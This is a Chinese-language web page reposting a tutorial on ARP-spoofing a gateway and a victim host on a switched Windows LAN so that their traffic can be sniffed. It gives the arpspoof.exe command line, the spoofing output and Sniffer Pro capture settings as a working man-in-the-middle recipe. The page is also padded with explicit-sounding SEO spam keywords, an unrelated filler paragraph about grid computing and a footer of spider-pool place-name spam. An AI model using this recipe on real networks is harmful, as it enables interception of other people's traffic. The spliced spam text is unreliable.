人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

Windows交換環境中ARP Sniffer的完成

Windows交換環境中ARP Sniffer的完成

更新時間:2021-01-12 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
根據交換環境中Sniffer實現的原理(詳見交換環境下Sniffer的實現),我寫了一個類似于Linux環境下的ArpSpoof實現在Windows環境下的Arp Sniffer。
  
  在交換環境下Windows中實現Sniffer需要具備的條件:
  
  1、安裝Winpcap驅動。
  
  2、我寫了一個類似于Linux環境下的ArpSpoof(我只在Windows 2000 Server下測試過,其他期待您的測試)。
  
  3、一個Sniffer,如NetXray或者NAI Sniffer Pro(推薦)。
  
  具體的實現方法:
  
  使用ArpSpoof實現基于ARP的欺騙:
  
  C:\>arpspoof.exe
  ARPSpoof, by netXeyes, Special Thanks BB
  www.netXeyes.com 2002, dansnow@21cn.com
  
  Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
   
  
  其中Spoof IP1和Spoof IP2是想要進行欺騙和嗅探的IP地址,Own IP是自己的IP地址(注意這三個IP必須是在同一個局域網內沒有跨越交換機或者路由器)。
  
  例如目前公司的局域網環境為192.168.0.xxx,子網掩碼為255.255.255.0,網關為192.168.0.1。我們的IP為192.168.0.29,想要Sniffer 192.168.0.2的數據包。
  
  由于網關為192.168.0.1,所以我們就只要欺騙192.168.0.1和192.168.0.2就可以了。也就是說告訴192.168.0.1,192.168.0.2的MAC地址是自己(192.168.0.29);然后再告訴192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。這樣以來所有的數據包都會發到192.168.0.29,并且由192.168.0.29實現轉發(windows 2000默認可以進行包轉發,至于Windows 9.x和Windows NT/XP我沒有測試過,希望您可以告訴我)。
  
  C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
  ARPSpoof, by netXeyes, Special Thanks BB
  www.netXeyes.com 2002, dansnow@21cn.com
  
  Begin Spoof.........
  
  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
  .....................................................
  
  是時候對192.168.0.1和192.168.0.2的ARP欺騙就開始了,在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一樣的。
  
  C:\>arp -a
  
  Interface: 192.168.0.1 on Interface 0x1000004
  Internet Address Physical Address Type
  192.168.0.2 00-00-86-61-6b-4e dynamic
  192.168.0.29 00-00-86-61-6b-4e dynamic
  
  同樣在192.168.0.2上面也會發現192.168.0.1和192.168.0.29的MAC地址是一樣的。
  
  這樣我們就在192.168.0.1和192.168.0.2之間實現了ARP欺騙。
  
  啟動Sniffer Pro,在Define Filter里面的Address Type中選擇Hardware(注意不要選為通常的類型IP,否則抓不到什么有意義的東西),Station1和Station2選擇設置為Any即可。
  
  
  這時候就開始Sniffer了。
  
  
  以上結果在我局域網環境中測試通過,不保證適用于所有的環境。


網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 牙克石市| 涿鹿县| 厦门市| 萝北县| 新兴县| 宣武区| 海口市| 柘荣县| 彭山县| 桑日县| 连云港市| 龙山县| 呼伦贝尔市| 阜宁县| 甘孜县| 彰武县| 大悟县| 平泉县| 大庆市| 桂平市| 建阳市| 连南| 大城县| 明水县| 蓝田县| 怀远县| 峨边| 乡城县| 财经| 清水河县| 观塘区| 合阳县| 黔西县| 兴文县| 广德县| 新源县| 汶上县| 泰顺县| 固原市| 碌曲县| 金川县|